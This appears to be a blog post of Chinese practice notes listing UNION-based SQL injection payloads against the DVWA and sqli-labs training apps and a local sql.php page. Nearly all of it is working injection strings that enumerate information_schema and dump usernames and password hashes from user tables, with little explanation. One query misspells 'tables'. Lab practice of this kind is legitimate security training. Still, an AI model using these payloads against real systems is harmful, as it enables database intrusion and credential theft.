sql爆破
1' and 2=1 union select 1,database() -- -
1000' union select 1,(select group_concat(table_name) from information_schema.talbes where table_schema='dvwa') -- -
1000' union select 1,(select group_concat(concat_ws(0x7e,column_name))from information_schema.columns where table_schema ='dvwa' and table_name='users') -- -
1000' union select 1,(select group_concat(concat_ws(0x7e,user_id,first_name,last_name,user,password,avatar,last_login,failed_login))from users ) -- -
中难度
high
训练
1 http://localhost/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,database(),3 -- -
http://localhost/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 -- --- -
http://localhost/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,(select group_concat(concat_ws(0x7e,column_name))from information_schema.columns where table_schema ='security' and table_name='users'),3 -- --- -
http://localhost/sqli-labs-master/Less-1/?id=1000' union select 1,(select group_concat(concat_ws(0x7e,id,username,password))from users ),3 -- -
2
http://localhost/sqli-labs-master/Less-2/?id=1000 union select 1,(select group_concat(concat_ws(0x7e,id,username,password))from users ),3 -- -
3.http://localhost/sqli-labs-master/Less-3/?id=1000') union select 1,(select group_concat(concat_ws(0x7e,id,username,password))from users ),3 -- -
4.
http://localhost/sqli-labs-master/Less-4/?id=1000") union select 1,(select group_concat(concat_ws(0x7e,id,username,password))from users ),3 -- -
3题
http://localhost/sql.php?parm=%27and%201=2%20%27%20%20union%20select%20(select%20group_concat(concat_ws(0x7e,column_name))from%20information_schema.columns%20where%20table_schema%20=%27mysql%27%20and%20table_name=%27user%27)%20,database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database()
http://localhost/sql.php?parm=%27and%201=2%20%27%20%20union%20select%20(select%20group_concat(concat_ws(0x7e,password))from%20user%20),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database(),database()
- 点赞
- 收藏
- 分享
- 文章举报
- SQL Server密码爆破工具SQLdict
- SQL Server密码爆破工具SQLdict
- SQL Server密码爆破工具SQLdict
- [原]使用SQL将数组转换为矩阵
- Sql Server Reporting Service的页面分页讨论
- RACLE分页查询SQL语法
- Oracle8i与MS SQL SERVER之比较
- 关于用 SQL 得到 Access 的随机记录集
- LINQ to SQL系列Part 8 - Using LINQ to SQL
- 几条常见的数据库分页 SQL 语句
- SQL - 删掉数据库
- SQL 中的左外连接和+号的用法
- 怎么用批处理*.bat 执行文件目录下面的SQL语句脚本(批量的)。。。@echo off是什么意思?
- 5段SQL可以测试出你对SQL性能优化知识了解多少
- sql语句删除数据表重复字段的方法
- MySQL数据库SQL语句整合
- Mybatis如何SQL声明表名称参数
- elasticsearch-sql插件
- 高级SQL语句简单举例
- SQL之GROUP BY 语句